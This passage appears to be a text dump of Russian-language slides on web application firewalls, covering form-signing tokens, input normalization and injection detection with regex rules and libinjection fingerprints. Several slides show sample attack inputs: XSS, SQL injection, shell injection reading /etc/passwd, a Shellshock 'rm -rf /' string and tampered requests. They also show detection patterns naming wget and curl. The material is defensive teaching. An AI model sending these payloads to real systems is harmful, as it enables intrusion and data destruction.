    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 403 Forbidden Server: WAF Content-Type: text/html; charset=utf-8 Content-Length: 9 Connection: close Forbidden
  91. Заголовок Минута из жизни WAF GET /app/?id=50484e6a636d6c776444356862475679644367784b54777663324e796158423050673d3d HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10
  92. Заголовок Минута из жизни WAF GET /app/?id=50484e6a636d6c776444356862475679644367784b54777663324e796158423050673d3d HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 function getID(request) { var rawID = request.getValue('id'); var id = hexdecode(base64decode(rawID)); return id; } // rawID = 50484e6a636d6c776444356862475679644367784b54777663324e796158423050673d3d // id = <script>alert(1)</script> Исходный код
  93. Заголовок Минута из жизни WAF GET /app/?id=50484e6a636d6c776444356862475679644367784b54777663324e796158423050673d3d HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 200 OK X-XSS-Protection: 0 Content-Type: text/html; charset=utf-8 Date: Wed, 15 Jun 2016 12:34:25 GMT Content-Length: 26 Connection: close <script>alert(1)</script>
  94. Заголовок Минута из жизни WAF GET /app?callback=delete_user_data HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: text/html; charset=utf-8 Date: Wed, 15 Jun 2016 12:34:25 GMT Content-Length: 26 Connection: close <html><body><script type="text/javascript"> window.opener.delete_user_data({"status":0,"token":"ItHumYWI[...snip..]","oauthstate":"1234","tokenid":"ToKeN1234 ","tokenexp":"0","gid":"401223423..","url":"http://example.com"}); </script></body></html>
  95. Заголовок Минута из жизни WAF GET /app?callback=delete_user_data HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: text/html; charset=utf-8 Date: Wed, 15 Jun 2016 12:34:25 GMT Content-Length: 26 Connection: close <html><body><script type="text/javascript"> window.opener.delete_user_data({"status":0,"token":"ItHumYWI[...snip..]","oauthstate":"1234","tokenid":"ToKeN1234 ","tokenexp":"0","gid":"401223423..","url":"http://example.com"}); </script></body></html>
  96. Заголовок Минута из жизни WAF GET /app?page=1&page=<script>alert(1)</script> HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10
  97. Заголовок Минута из жизни WAF GET /app?page=1&page=<script>alert(1)</script> HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10
  98. Заголовок Минута из жизни WAF POST /download?document_id=1123123&user_id=234123423&action_id=100 HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10
  99. Заголовок Минута из жизни WAF POST /download?document_id=1123123&user_id=234123423&action_id=100 HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10
  100. Заголовок Минута из жизни WAF GET /delete_account HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: text/html; charset=utf-8 Date: Wed, 15 Jun 2016 12:34:25 GMT Content-Length: 26 Connection: close
  101. Заголовок Минута из жизни WAF GET /delete_account HTTP/1.1 Host: example.com

    Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Accept-Encoding: gzip, deflate, sdch Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4 Cookie: JSESSIONID=EAEC35B5E8741B4BA1524F25301A5E10 HTTP/1.1 200 OK X-XSS-Protection: 1 Content-Type: text/html; charset=utf-8 Date: Wed, 15 Jun 2016 12:34:25 GMT Content-Length: 26 Connection: close
  102. Заголовок В чем проблема? <html> <body> <form action="update" method="POST"> <input

    type="hidden" name="price" value="100"> <input type="hidden" name="role" value="user"> <input type="text" name="quantity" value=""> <input type="text" name="email" value="[email protected]"> <input type="submit" value="Send"> </form> </body> </html> POST /update HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded price=100&role=user&quantity=1&[email protected]
  103. Заголовок • CSRF • SSRF • Injections (SQLi, XSS, LDAPi,

    …) • Access control attacks (IDOR) • Business logic attacks Форма одна, атак много…
  104. Заголовок «Подписи запросов» API • Yahoo, Amazon S3, Facebook ASP.NET

    Framework • Event Validation • View State MAC WAF • ModSecurity: HMAC Token Protection • F5 Networks ASM: Dynamic Content Value • Citrix NetScaler: Form Signature • PT AF: Form Signing Механизм защиты
  105. Заголовок Client ← Server: p, h(k, p) Client → Server:

    p', h(k, p) Server: h(k, p) = h(k, p') Параметры: • h – функция HMAC • p – значение параметра • k – секретный ключ сервера Элементарный протокол
  106. Заголовок Элементарный протокол <html> <body> <form action="update" method="POST"> <input type="text"

    name="price" value="100"> <input type="submit" value="Send"> </form> </body> </html> POST /update HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded price=100
  107. Заголовок Содержание в формах большого количества полей Различное представление форм

    для различных клиентов Наличие в формах опциональных элементов • Checkbox • Option • Radio Идентификация защищаемых форм в HTTP-ответах Идентификация скрытых элементов форм в HTTP-запросах Ввод данных на стороне клиента Сложности на практике
  108. Заголовок Client ← Server: p, h(k, p) Client → Server:

    p', h(k, p) Server: h(k, p) = h(k, p') Как использовать этот протокол если значение p формируется в браузере на основе ввода пользователя? Ввод данных на стороне клиента
  109. Заголовок Client ← Server: p, h(k, Tr(p, regex)) Client →

    Server: p', h(k, Tr(p, regex)) Server: h(k, Tr(p, regex)) = h(k, Tr(p', regex)) Параметры: • regex – валидирующее регулярное выражение для значения параметра • Tr(s, regex) – операция удаления из строки s подстрок, соответствующих regex • Tr("abc123", "[a-z]+" ) = "123" Валидирующее хэширование key string regex R HMAC of L(R)
  110. Заголовок 1. Построение Authentication Base String (ABS) • Method •

    URL • Идентификатор сессии • Параметры • Имя • [Значение] • [Тип] Метод вычисления токена
  111. Заголовок 2. Построение контейнеров формы • Контейнер скрытых полей -

    HFC HFC = {hp1_name , …, hpM_name } • Контейнер опциональных полей - OFC OFC = { {op1_name , op1_value1 , …, op1_valueN1 }, …, {opL_name , opL_value1 , …, opL_valueNL } } Метод вычисления токена
  112. Заголовок 3. Вычисление подписи signature = HMAC(k, HFC · OFC

    · HMAC(k, ABS, time)) • k – секретный ключ • time – текущее значение времени Метод вычисления токена
  113. Заголовок 1. Парсинг входящего HTTP-запроса 2. Проверка метода запроса 3.

    Проверка наличия токена 4. Для POST-запроса по полученному URL выполняется поиск политики 5. Если политика найдена, то распаковываются данные из токена 6. Проверка опциональных и скрытых полей, если они есть 7. Формирование ABS и его проверка Метод проверки токена
  114. Заголовок • Нельзя защитить формы, динамически сгенерированные на стороне клиента

    средствами JavaScript • Нельзя защитить формы, отправленные средствами JavaScript • Необходимо различать запросы, отправленные средствами веб-форм от запросов AJAX • Сложно защитить формы, отправляемые на сервер методом GET Ограничения метода
  115. Заголовок • Защита приложения от анализа • Уменьшение поверхности атак

    на приложение • Противодействие средствам автоматизации • Предотвращение использования известных эксплойтов Результаты
  116. Заголовок Пример: исходная форма <html> <body> <form action="update" method="POST"> <input

    type="hidden" name="price" value="100"> <input type="hidden" name="role" value="user"> <input type="text" name="quantity" value="1"> <input type="text" name="email" value="[email protected]"> </form> </body> </html>
  117. Заголовок Пример: описание языка <html> <body> <form action="update" method="POST"> <input

    type="hidden" name="price" value="100"> <input type="hidden" name="role" value="user"> <input type="text" name="quantity" value="1"> <input type="text" name="email" value="[email protected]"> </form> </body> </html> Регулярный язык: \d+
  118. Заголовок Пример: новая форма <html> <body> <form action="update" method="POST"> <input

    type="hidden" name="price" value="100"> <input type="hidden" name="role" value="user"> <input type="text" name="quantity" value="1"> <input type="text" name="email" value="[email protected]"> <input type="hidden" name="token" value="2341234123…"> </form> </body> </html>
  119. Заголовок Пример: аутентичный запрос POST /update HTTP/1.1 Host: server.com Content-Type:

    application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 price=100&quantity=2&role=user&[email protected]&token=2341234123…
  120. Заголовок Пример: атака CSRF POST /delete HTTP/1.1 Host: server.com Content-Type:

    application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 price=100&quantity=2&role=user&[email protected]&token=
  121. Заголовок Пример: атака повтора POST /admin/delete_account HTTP/1.1 Host: server.com Content-Type:

    application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=43538475283745823748572345374527345 user=100001&token=2341234123…
  122. Заголовок Пример: атака на бизнес-логику POST /update HTTP/1.1 Host: server.com

    Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 price=-100&quantity=2&role=user&[email protected]&token=2341234123…
  123. Заголовок Пример: атака HPP POST /update HTTP/1.1 Host: server.com Content-Type:

    application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 price=100&quantity=2&role=user&price=-100&token=2341234123…
  124. Заголовок Пример: атака IDOR POST /update HTTP/1.1 Host: server.com Content-Type:

    application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 price=100&quantity=2&role=admin&[email protected]&token=2341234123…
  125. Заголовок Пример: атака XSS POST /update HTTP/1.1 Host: server.com Content-Type:

    application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 price=100&quantity=<svg/onload=alert(1)>&role=user&token=2341234123…
  126. Заголовок Normalization Negative security model (Blacklisting) • Signature-based (regular expressions,

    text) • Rule-based • Syntax-based Positive security model (Whitelisting) • Static Profiling • Dynamic Profiling • Machine learning Механика обнаружения инъекций Web Application Firewall Evaluation Criteria
  127. Заголовок Алгоритм формирования выходных данных DOUTPUT на основе входных данных

    DINPUT уязвим к атаке инъекции, если дерево разбора (parse tree) для DOUTPUT зависит от DINPUT Признак уязвимости к инъекции
  128. Заголовок SQL: id=42' or 1=1-- - HTML: 111"><a href =

    "//evil.com"> JavaScript: 1"; alert(document.domain);// Shell Command Injection: 192.168.10.1 && cat /etc/passwd LDAP Injection: admin)|((userpassword=*) XPath Injection: user' or name()='admin' or 'x'='y Shellshock: test () { :; }; rm –rf / Примеры инъекций
  129. Заголовок Нормализация – процесс преобразования данных к виду, понимаемому защищаемым

    веб- приложением Цель – устранение недостатка типа Differential Parsing Кодирование • URL decoding • Null-byte string termination • BASE64 decoding • HTML entities decoding • Double encoding Парсинг • URL Path • HTTP Parameters • Hostname Нормализация
  130. Заголовок Пример GET /update?id=1+union+select+1/* HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded User-Agent:

    Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475
  131. Заголовок Пример GET /update?id=1;select+1&id=2,3# HTTP/1.1 Host: server.com Content-Type: application/x-www-form-urlencoded User-Agent:

    Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Cookie: session=38475238453847523847523847583475238475 ASP.NET/IIS id = 1;SELECT 1,2,3 # PHP/Apache id = 2,3 #
  132. Заголовок Основные принципы нормализации • приведение обрабатываемых данных к такому

    же формату и виду, к каким приведет его защищаемое веб-приложение • эквивалентный парсинг T. Ptacek, T.Newsham. Insertaion, Evasion, and Denial of Service: Eluding Network Intrusion Detection. Secure Networks, Inc. 1998 Ivan Ristic. Protocol-Level Evasion of Web Application Firewalls Нормализация
  133. Заголовок Лексический подход (регулярные выражения) Лексико-сигнатурный подход • Libinjection (Nick

    Galbreath) Синтаксический подход (parsing-based) • Dejector (Patterson, Hansen) • Libdetection (Wallarm) • Waf.js (Positive Technologies) • Indexed syntax graph (Shape Security) Negative Security Model
  134. Заголовок Использование регулярных выражений (конечных автоматов) для распознавания регулярного языка

    атак Имеется L – регулярный язык атак, заданный регулярными выражениями R Если входное слово принадлежит языку L, т. е. допускается регулярным выражением из R, то входное слово – атака Лексический подход
  135. Заголовок Лексический подход (?:\/[^\?\/]+\.(?:bat|cmd|ps1|wsf|sh|wsh|hta|vbs|vbe)(?:\;[^\?\/]*)?\?)|\?.+\=.*(?:(?:ActiveXObject|CreateObject|Exec)\((?:"|')|\((?:'| ")WScript\.Shell) LDAP Search Filter Injection (?:\((?:\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\b\W*?=|[^\w\x80-\xFF]*?[\!\&\|][^\w\x80-

    \xFF]*?\()|\)[^\w\x80-\xFF]*?\([^\w\x80-\xFF]*?[\!\&\|]) Reflected File Download SSRF (gopher|jar|tftp|php|phar|ldap|dict|ssh2|file|ogg|expect|imap|pop3|smtp|telnet|mailto|zlib|rar|compress\.zlib|glob|data):\/\/ (?i:(?:[\;\|\`]\W*?\bcc|\b(wget|curl))\b|\/cc(?:[\'\"\|\;\`\-\s]|$)) OS Command Injection SSI Injection <!--\W*?#\W*?(?:e(?:cho|xec)|printenv|include|cmd)
  136. Заголовок Лексический подход SQL Injection # Detect SQL Comment Sequences

    (/\*!?|\*/|[';]--|--[\s\r\n\v\f]|(?:--[^-]*?-)|([^\-&])#.*?[\s\r\n\v\f]|;?\\x00) # SQL Hex Evasion Methods (?i:(?:\A|[^\d])0x[a-f\d]{3,}[a-f\d]*)+ # String Termination/Statement Ending Injection Testing (^[\"'`´’‘;]+|[\"'`´’‘;]+$) # SQL Operators (?i:(\!\=|\&\&|\|\||>>|<<|>=|<=|<>|<=>|\bxor\b|\brlike\b|\bregexp\b|\bisnull\b)|(?:not\s+between\s+0\s+and)|(?:is\s+null)|(like\s+ null)|(?:(?:^|\W)in[+\s]*\([\s\d\"]+[^()]*\))|(?:\bxor\b|<>|rlike(?:\s+binary)?)|(?:regexp\s+binary)) # SQL Tautologies (?i:([\s'\"`´’‘\(\)]*?)\b([\d\w]++)([\s'\"`´’‘\(\)]*?)(?:(?:=|<=>|r?like|sounds\s+like|regexp)([\s'\"`´’‘\(\)]*?)\2\b|(?:!=|<=|>=|<>|<|>|\^|is\s +not|not\s+like|not\s+regexp)([\s'\"`´’‘\(\)]*?)(?!\2)([\d\w]+)\b)) # Detect DB Names (?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|ast er\.\.sysdatabases|ysql\.db)|s(?:ys(?:\.database_name|aux)|chema(?:\W*\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_nam)e\W*\(| information_schema|pg_(catalog|toast)|northwind|tempdb))
  137. Заголовок Лексический подход SQL Injection (?i:\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_u ser|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv6|not_null|not|null|used_lock))?|n(?:et6?_ (aton|ntoa)|s(?:ert|tr)|terval)?|f(null)?)|u(?:n(?:compress(?:ed_length)?|ix_timestamp|hex)|tc_(date|time|timestamp)|p(?:datexml|per)|uid(_short)?|ca se|ser)|l(?:o(?:ca(?:l(timestamp)?|te)|g(2|10)?|ad_file|wer)|ast(_day|_insert_id)?|e(?:(?:as|f)t|ngth)|case|trim|pad|n)|t(?:ime(stamp|stampadd|stamp diff|diff|_format|_to_sec)?|o_(base64|days|seconds|n?char)|r(?:uncate|im)|an)|m(?:a(?:ke(?:_set|date)|ster_pos_wait|x)|i(?:(?:crosecon)?d|n(?:ute)?)|

    o(?:nth(name)?|d)|d5)|r(?:e(?:p(?:lace|eat)|lease_lock|verse)|o(?:w_count|und)|a(?:dians|nd)|ight|trim|pad)|f(?:i(?:eld(_in_set)?|nd_in_set)|rom_(bas e64|days|unixtime)|o(?:und_rows|rmat)|loor)|a(?:es_(?:de|en)crypt|s(?:cii(str)?|in)|dd(?:dat|tim)e|(?:co|b)s|tan2?|vg)|p(?:o(?:sition|w(er)?)|eriod_(ad d|diff)|rocedure_analyse|assword|i)|b(?:i(?:t_(?:length|count|x?or|and)|n(_to_num)?)|enchmark)|e(?:x(?:p(?:ort_set)?|tract(value)?)|nc(?:rypt|ode)|lt) |v(?:a(?:r(?:_(?:sam|po)p|iance)|lues)|ersion)|g(?:r(?:oup_conca|eates)t|et_(format|lock))|o(?:(?:ld_passwo)?rd|ct(et_length)?)|we(?:ek(day|ofyear)?|ig ht_string)|n(?:o(?:t_in|w)|ame_const|ullif)|(rawton?)?hex(toraw)?|qu(?:arter|ote)|(pg_)?sleep|year(week)?|d?count|xmltype|hour)\W*\(|\b(?:(?:s(?:ele ct\b(?:.{1,100}?\b(?:(?:length|count|top)\b.{1,100}?\bfrom|from\b.{1,100}?\bwhere)|.*?\b(?:d(?:ump\b.*\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p _(?:sqlexec|sp_replwritetovarbin|sp_help|addextendedproc|is_srvrolemember|prepare|sp_password|execute(?:sql)?|makewebtask|oacreate)|ql_(?:longv archar|variant))|xp_(?:reg(?:re(?:movemultistring|ad)|delete(?:value|key)|enum(?:value|key)s|addmultistring|write)|terminate|xp_servicecontrol|xp_nts ec_enumdomains|xp_terminate_process|e(?:xecresultset|numdsn)|availablemedia|loginconfig|cmdshell|filelist|dirtree|makecab|ntsec)|u(?:nion\b.{1,10 0}?\bselect|tl_(?:file|http))|d(?:b(?:a_users|ms_java)|elete\b\W*?\bfrom)|group\b.*\bby\b.{1,100}?\bhaving|open(?:rowset|owa_util|query)|load\b\W* ?\bdata\b.*\binfile|(?:n?varcha|tbcreato)r|autonomous_transaction)\b|i(?:n(?:to\b\W*?\b(?:dump|out)file|sert\b\W*?\binto|ner\b\W*?\bjoin)\b|(?:f(?: \b\W*?\(\W*?\bbenchmark|null\b)|snull\b)\W*?\()|print\b\W*?\@\@|cast\b\W*?\()|c(?:(?:ur(?:rent_(?:time(?:stamp)?|date|user)|(?:dat|tim)e)|h(?:ar( ?:(?:acter)?_length|set)?|r)|iel(?:ing)?|ast|r32)\W*\(|o(?:(?:n(?:v(?:ert(?:_tz)?)?|cat(?:_ws)?|nection_id)|(?:mpres)?s|ercibility|alesce|t)\W*\(|llation\W* \(a))|d(?:(?:a(?:t(?:e(?:(_(add|format|sub))?|diff)|abase)|y(name|ofmonth|ofweek|ofyear)?)|e(?:(?:s_(de|en)cryp|faul)t|grees|code)|ump)\W*\(|bms_\ w+\.\b)|(?:;\W*?\b(?:shutdown|drop)|\@\@version)\b|\butl_inaddr\b|\bsys_context\b|'(?:s(?:qloledb|a)|msdasql|dbo)'))
  138. Заголовок Регулярные выражения – определение языка атак Правила – определение

    контекста и логики Правила • Условия • Ограничения • Контекст • Источники • Корреляции • Реакции Правила
  139. Заголовок Пример правил CloudFlare WAF Anonymous Attack rule 1234567A Simple

    POST botnet REQUEST_METHOD is POST and REQUEST_URI is /q deny rule 12345679 Anonymous attack REQUEST_METHOD is GET and REQUEST_URI begins /?msg=Nous%20sommes%20Anonymous deny Simple POST Botnet
  140. Заголовок Пример правил: NAXSI SQL injection ## Hardcore rules MainRule

    "str:/*" "msg:mysql comment (/*)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:8" id:1003; MainRule "str:*/" "msg:mysql comment (*/)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:8" id:1004; MainRule "str:|" "msg:mysql keyword (|)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:8" id:1005; MainRule "str:&&" "msg:mysql keyword (&&)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:8" id:1006; ## end of hardcore rules MainRule "str:--" "msg:mysql comment (--)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:4" id:1007; MainRule "str:;" "msg:semicolon" "mz:BODY|URL|ARGS" "s:$SQL:4,$XSS:8" id:1008; MainRule "str:=" "msg:equal sign in var, probable sql/xss" "mz:ARGS|BODY" "s:$SQL:2" id:1009; MainRule "str:(" "msg:open parenthesis, probable sql/xss" "mz:ARGS|URL|BODY|$HEADERS_VAR:Cookie" "s:$SQL:4,$XSS:8" id:1010; MainRule "str:)" "msg:close parenthesis, probable sql/xss" "mz:ARGS|URL|BODY|$HEADERS_VAR:Cookie" "s:$SQL:4,$XSS:8" id:1011; MainRule "str:'" "msg:simple quote" "mz:ARGS|BODY|URL|$HEADERS_VAR:Cookie" "s:$SQL:4,$XSS:8" id:1013; MainRule "str:," "msg:comma" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:4" id:1015; MainRule "str:#" "msg:mysql comment (#)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:4" id:1016; MainRule "str:@@" "msg:double arobase (@@)" "mz:BODY|URL|ARGS|$HEADERS_VAR:Cookie" "s:$SQL:4" id:1017;
  141. Заголовок Пример правил: ModSecurity Heuristic Checks # # -=[ Heuristic

    Checks ]=- # # [ Repeatative Non-Word Chars ] # # This rule attempts to identify when multiple (4 or more) non-word characters are repeated in sequence # SecRule ARGS "\W{4,}" "phase:2,capture,t:none,t:urlDecodeUni,block,id:'960024',rev:'2',ver:'OWASP_CRS/2.2.9',maturity:'9',ac curacy:'8',msg:'Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:'tx.msg=%{rule.msg}',setva r:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{tx.0}"
  142. Заголовок Пример правил: PT AF Reflected File Download { "rule":

    { "and": [ { "REQUEST_URI": { "regex": "(?:\\/[^\\?\\/]+\\.(?:bat|cmd|ps1|wsf|sh|wsh|hta|vbs|vbe)(?:\\;[^\\?\\/]*)?\\?)|\\?.+\\=.*(?:(?:ActiveXObject|CreateObject|Exec)\\((? :\\x22|')|\\((?:'|\\x22)WScript\\.Shell)" } }, { "RESPONSE_HEADERS;content-disposition": { "itext": "attachment" } } ] } }
  143. Заголовок Предложил Nick Galbreath в 2012 для обнаружения SQL-инъекций Позднее

    данный подход был адаптирован для обнаружения XSS Реализован в библиотеке libinjection Основные идеи • Токенизация в соответствии с универсальной грамматикой лексера в 3-х контекстах • Строится свертка токенов • Строка из первых пяти токенов ищется в базе сигнатур • База сигнатур строится по популярным векторам атак Лексико-сигнатурный подход
  144. Заголовок Пример input = 42" or "1"="1" -- Context AS_IS

    = 42" or "1"="1" -- 1 Токены ('1', '42'): number ('s', ' " or "'): string ('1', '1'): number ('s', ' "=" '): string ('1', '1'): number ('s', ' "--'): string
  145. Заголовок Пример input = 42" or "1"="1" -- Context AS_IS

    = 42" or "1"="1" -- 1 ('1', '42'): number ('s', ' " or "'): string ('1', '1'): number ('s', ' "=" '): string ('1', '1'): number ('s', ' "--'): string Токены 1s1s1s Сигнатура
  146. Заголовок Пример input = 42" or "1"="1" -- Context AS_IS

    = 42" or "1"="1" -- 1 ('1', '42'): number ('s', ' " or "'): string ('1', '1'): number ('s', ' "=" '): string ('1', '1'): number ('s', ' "--'): string Токены Сигнатура 1s1s1s
  147. Заголовок Пример input = 42" or "1"="1" -- Context SINGLE_QUOTE

    = '42" or "1"="1" -- 2 ('s', ' \'42" or "1"="1" --'): string Токены
  148. Заголовок Пример input = 42" or "1"="1" -- Context SINGLE_QUOTE

    = '42" or "1"="1" -- 2 ('s', ' \'42" or "1"="1" --'): string Токены s Сигнатура
  149. Заголовок Пример input = 42" or "1"="1" -- Context SINGLE_QUOTE

    = '42" or "1"="1" -- 2 ('s', ' \'42" or "1"="1" --'): string Токены s Сигнатура
  150. Заголовок Пример input = 42" or "1"="1" -- Context DOUBLE_QUOTES

    = "42" or "1"="1" -- 3 ('s', ' "42" '): string ('&', 'or'): logic operator ('s', ' "1" '): string ('o', '='): operator ('1', ' "1" '): string ('c', '--'): comment Токены
  151. Заголовок Пример input = 42" or "1"="1" -- Context DOUBLE_QUOTES

    = "42" or "1"="1" -- 3 Токены s&sos Сигнатура ('s', ' "42" '): string ('&', 'or'): logic operator ('s', ' "1" '): string ('o', '='): operator ('1', ' "1" '): string ('c', '--'): comment
  152. Заголовок Пример input = 42" or "1"="1" -- Context DOUBLE_QUOTES

    = "42" or "1"="1" -- 3 Токены s&sos Сигнатура ('s', ' "42" '): string ('&', 'or'): logic operator ('s', ' "1" '): string ('o', '='): operator ('1', ' "1" '): string ('c', '--'): comment
  153. Заголовок &(1)U &(1)o &(1o( &(1of &(1os &(1ov &(f() &(nof &(nos

    &(nov &(s)U Примеры сигнатур https://github.com/client9/libinjection/blob/master/src/fingerprints.txt
